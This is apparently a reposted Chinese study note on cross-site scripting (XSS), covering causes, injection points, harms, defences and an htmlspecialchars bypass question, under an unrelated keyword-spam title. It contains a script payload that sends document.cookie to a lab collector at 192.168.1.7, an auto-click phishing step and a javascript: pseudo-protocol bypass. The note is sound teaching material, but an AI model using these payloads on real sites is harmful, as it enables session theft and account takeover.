您的位置:首页 > 新闻 > 资讯 > 网站建设课程总结_seo型网站_营销培训总结_类似58的推广平台有哪些平台

网站建设课程总结_seo型网站_营销培训总结_类似58的推广平台有哪些平台

2025/1/8 7:25:59 来源:https://blog.csdn.net/zhzx123aa/article/details/144993880  浏览:    关键词:网站建设课程总结_seo型网站_营销培训总结_类似58的推广平台有哪些平台
网站建设课程总结_seo型网站_营销培训总结_类似58的推广平台有哪些平台

 目录

XSS介绍的原理和说明

Cross Site Scripting

钓鱼

XSS攻击原理

XSS漏洞出现的原因:

XSS产生的原因分析

XSS出现位置:

XSS测试方法

XSS的危害

防御手段:

其它防御

面试题:

备注:


XSS介绍的原理和说明

  • 嵌入在客户端脚本 对客户端进行攻击的
  • Owstop ten 十大漏洞

OWASP(开放式Web应用程序安全项目)的工具、文档、论坛和全球各地分会都是开放的,对所有致力于改进应用程序安全的人士开放,其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结了Web应用程序最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。

  • Cross Site Scripting

跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以在代码审计中xss漏洞关键就是寻找参数未过滤的输出函数。

钓鱼【XSS实例中的一种】

"<script> document.location = 'http://192.168.1.7/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie; </script>"

整体的获取过程

  • 先看看哪里有xss漏洞 再去干
  • 黑客先登录这个网站 清除cookie信息
  • 钓鱼就是调cookie
  • 网址没有变化就是post请求 不是get请求
  • document.getElementById("postsubmit").click();
  • 找到这个标签自动点击这个标签
  • ----------------------------------------------------------------------------------------------------------
  • 1 首先解析 自上而下执行完成
  • 2 获取cookie攻击代码 获取浏览器cookie
  • 3 执行windowws.onload 开始执行这个方法
  • 4 执行这个方法 document.getElementById("postsubmit").click();执行这个按钮
  • 5 发送这个html给用户 用户使用用户名密码进行登录 cookie就发送给黑客的网站了
  • 6 这样的方式就叫做钓鱼

XSS攻击原理

XSS漏洞出现的原因:

  • 程序对输入和输出的控制不够严格

    • 导致"精心构造"的脚本输入后

    • 在输出到前端时被浏览器当作有效代码解析执行从而产生危害

XSS产生的原因分析

  • 服务端程序没有对输入输出严格的过滤

    • 导致黑客精心构造的输入脚本,输入到了服务端

    • 然后并且输出浏览器当成有效的代码执行了,导致了客户端收到了攻击。

  • 如果客户端不是有效的代码,只是数据,攻击客户端的只有可执行的程序

  • 只要不是程序就执行不起来,浏览器默认解析js代码,解析就会执行这个代码。
    • 如何让他不执行
    • 这个后端就会有防御手段。

XSS出现位置:

  • 哪里提交了数据
  • 哪里展示了数据
  • 也就是有输入有输出的地方 js只有在浏览器不能执行 只能在浏览器上运行
  • 用户输入输出用户交互的地方 都可能存在xss攻击
  • Html文档中 标签中
  • URLContext
  • Css样式

XSS测试方法

  • 工具扫描

  • 手工测试

  • 工具和手工 都需要我们去综合利用

XSS的危害

  • 窃取cookie的sessionid,冒充用户登录
  • 盗取各类用户账号,如机器登录帐号、用户网银帐号、各类管理员帐号
  • 盗窃企业重要的具有商业价值的资料
  • 控制受害者机器向其它网站发起攻击(重定向语句)
  • 控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
  • 强制发送电子邮件
  • 网站挂马
  • 非法转账

防御手段:

  • 用户提交数据的时候
    • 没有在客户端进行过滤js代码,当然也可以绕过让过防御手段

  • 服务端将js存储在数据库中的代码
    • 服务端给出html代码,攻击代码被服务端解析到html
    • 发送给客户端了,这样客户端就解析了xss代码
    • 这个时候服务端就需要做输出过滤 不在是js代码 是普普通通的数据】 客户端就不会执行js代码

  • 如果您在cookie中设置了HttpOnly属性
    • 那么通过js脚本将无法读取到cookie信 息
    • 这样能有效的防止XSS攻击导致的cookie被盗取。 

  • 对输入进行过滤或清理

  • 使用预备语句
    • 在数据库查询中使用预备语句以避免XSS攻击通过输入传播到数据库

  • 实施输出编码
    • 确保在输出到HTML时使用适当的HTML编码函数

  • 使用内容安全策略

  • 审查和测试

  • 定期进行安全审计和漏洞扫描

其它防御

对输入进行过滤

  • 对输出进行编码 --- 编码指的是html实体编码

输入输出的位置

  • 输出给了js,js代码中直接将编码正常的标签编码 ----- 输出到html能识别的编码

面试题:

如果服务端使用了htmlspecialchars 防范

  • 你该如何处理我们使用

  • JavaScript伪协议

    • 使用前提

      • xss之href输出绕过:javascript:alert(1111)

      • 直接代入a标签herf里面一样可以绕过htmlspecialchars

      • 如果没有把用户提交的数据交给a标签,其实很难绕过了

      • 以及js代码写入进行绕过

备注:

  • 输入输出都没有做严格的过滤 这个在视频上还要多研究研究 XSS漏洞出现的本质原因
  • XSS玩的最多的就是盗取Cookie JS 代码能干啥 就取决于JS代码的功能,XSS代码能造成多大的影响取决于js代码

  • 而这玩意我们称之为钓鱼

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com